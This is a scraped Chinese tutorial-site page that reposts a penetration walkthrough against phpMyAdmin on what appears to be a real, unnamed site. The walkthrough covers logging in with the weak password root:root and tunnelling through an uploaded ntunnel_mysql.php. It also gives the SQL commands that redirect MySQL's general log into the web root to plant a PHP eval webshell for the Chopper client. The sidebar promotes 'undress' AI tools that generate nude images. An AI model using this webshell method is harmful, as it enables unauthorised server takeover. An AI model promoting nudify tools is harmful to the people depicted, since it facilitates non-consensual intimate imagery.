Share a penetration test by Phpmyadmin-phpMyAdmin-php.cn

Home

Database

phpMyAdmin

Share a penetration test by Phpmyadmin

藏色散人

Mar 12, 2021 am 11:55 AM

phpmyadmin

The following is a penetration test of Phpmyadmin from the tutorial column of phpmyadmin. I hope it will be helpful to friends in need!

First scan a certain site through directory scanning and find that phpmyadmin exists. Try the weak password root: root is lucky to get in

##Try to use When Navicate connects to the database, it returns that remote connection to the database is prohibited:

However, the remote command execution found that the local 3306 port was open, so it tried to connect through a proxy:

Upload the ntunnel_mysql.php file (database proxy script) in the Navicat installation directory to any web site directory on the target server (uploaded later after getshell)

Upload to the D:/phpStudy/WWW directory to access http://XXX/ntunnel_mysql.php Test successful

Test connection:

(At this time, open Navicat locally to configure the http connection. The channel address here is the url you visited above. To put it bluntly, On the agent side, check the box to use base64 encoding to prevent waf from causing trouble. Then write localhost as the host name, and write the account of the lnmp01 local database user as the account password, because you need to connect to the local mysql of lnmp01)

Phpmyadmin Get Shell:

Use log files

mysql version 5.0 or above will create log files and modify the global log file Variables can also be used with getshell. But you must also have read and write permissions on the generated logs.

set global general_log = "ON";   #当开启general时，所执行的sql语句都会出现在WIN-30DFNC8L78A.log文件那么，如果修改general_log_file的值，那么所执行的sql语句就会对应生成进而getshell
SET global general_log_file=&#39;D:/phpStudy/WWW/test1234.php&#39;;  #对应就会生成test1234.php文件
select &#39;<?php eval($_POST[2019]);?>&#39;;          #将一句话木马写入test1234.php文件

Chopper connection:

The above is the detailed content of Share a penetration test by Phpmyadmin. For more information, please follow other related articles on the PHP Chinese website!

Statement

This article is reproduced at:cnblogs. If there is any infringement, please contact admin@php.cn delete

SQL and phpMyAdmin: A Beginner's GuideApr 16, 2025 am 12:02 AM

Beginners can learn SQL and phpMyAdmin from scratch. 1) Create database and tables: Create a new database in phpMyAdmin and create tables using SQL commands. 2) Execute basic query: Use SELECT statement to query data from the table. 3) Optimization and best practices: Create indexes, avoid SELECT*, use transactions, and regularly back up databases.

MySQL, phpMyAdmin, and Database Administration: A GuideApr 15, 2025 am 12:01 AM

MySQL and phpMyAdmin are powerful database management tools. 1.MySQL is an open source relational database management system, and phpMyAdmin is a MySQL management tool based on the Web. 2.MySQL works through the client-server model, and phpMyAdmin simplifies database operations. 3. Basic usage includes creating tables and data operations, and advanced usage involves stored procedures and triggers. 4. Common errors include SQL syntax errors, permission issues and performance bottlenecks. 5. Optimization techniques include reasonable use of indexes, optimized query, regular maintenance and backup and recovery.

phpMyAdmin: Unveiling Its Relationship to SQLApr 14, 2025 am 12:11 AM

phpMyAdmin implements the operation of the database through SQL commands. 1) phpMyAdmin communicates with the database server through PHP scripts, generates and executes SQL commands. 2) Users can enter SQL commands in the SQL editor for query and complex operations. 3) Performance optimization suggestions include optimizing SQL queries, creating indexes and using pagination. 4) Best practices include regular backups, ensuring security and using version control.

phpMyAdmin: Enhancing Database ProductivityApr 13, 2025 am 12:04 AM

phpMyAdmin improves database productivity through an intuitive web interface: 1. Simplify the creation and management of databases and tables; 2. Support complex SQL queries and data operations; 3. Provide relationship view functions to manage table relationships; 4. Optimize performance and best practices to improve efficiency.

phpMyAdmin's Purpose: Managing MySQL Databases with EaseApr 12, 2025 am 12:14 AM

phpMyAdmin is a web-based MySQL database management tool. 1. It supports basic CRUD operations and advanced features such as database design and performance optimization. 2. Run through the web server, accept user input and convert it to MySQL commands. 3. The basic usage includes creating a database, and the advanced usage supports query optimization. 4. Common errors such as insufficient permissions can be solved by checking user permissions. 5. Performance optimization includes index optimization, query optimization and database design.

The Roles of MySQL and phpMyAdmin: A Detailed BreakdownApr 11, 2025 am 12:14 AM

The roles of MySQL and phpMyAdmin are to store and manage data and provide user-friendly database management interfaces. MySQL performs data operations through SQL, phpMyAdmin interacts with MySQL through HTTP requests, and converts user operations into SQL commands.

phpmyadmin connection to databaseApr 10, 2025 pm 11:09 PM

How to connect to the database through phpMyAdmin: Visit the phpMyAdmin website and log in with credentials. Select the database to connect to. Under the Actions tab, select the Export option. Configure export settings and select format, table, and data range. Save the exported file. Select the Import tab in the target database and browse the exported files. Click the "Execute" button and use the "Query" tab to verify that the import is successful.

How to connect to oracle by phpmyadminApr 10, 2025 pm 11:03 PM

Connect phpMyAdmin to the Oracle database by following the steps: 1. Install the Oracle driver; 2. Create a database connection, including host, username, password, port, and type; 3. Save settings to establish a connection; 4. Select the connected Oracle database from phpMyAdmin to manage and use it.

See all articles

Hot AI Tools

Undresser.AI Undress

AI-powered app for creating realistic nude photos

AI Clothes Remover

Online AI tool for removing clothes from photos.

Undress AI Tool

Undress images for free

Clothoff.io

AI clothes remover

AI Hentai Generator

Generate AI Hentai for free.

Hot Article

R.E.P.O. Energy Crystals Explained and What They Do (Yellow Crystal)

4 weeks agoBy尊渡假赌尊渡假赌尊渡假赌

R.E.P.O. Best Graphic Settings

4 weeks agoBy尊渡假赌尊渡假赌尊渡假赌

Assassin's Creed Shadows: Seashell Riddle Solution

2 weeks agoByDDD

R.E.P.O. How to Fix Audio if You Can't Hear Anyone

4 weeks agoBy尊渡假赌尊渡假赌尊渡假赌

R.E.P.O. Chat Commands and How to Use Them

4 weeks agoBy尊渡假赌尊渡假赌尊渡假赌

Hot Tools

VSCode Windows 64-bit Download

A free and powerful IDE editor launched by Microsoft

DVWA

Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is very vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, to help web developers better understand the process of securing web applications, and to help teachers/students teach/learn in a classroom environment Web application security. The goal of DVWA is to practice some of the most common web vulnerabilities through a simple and straightforward interface, with varying degrees of difficulty. Please note that this software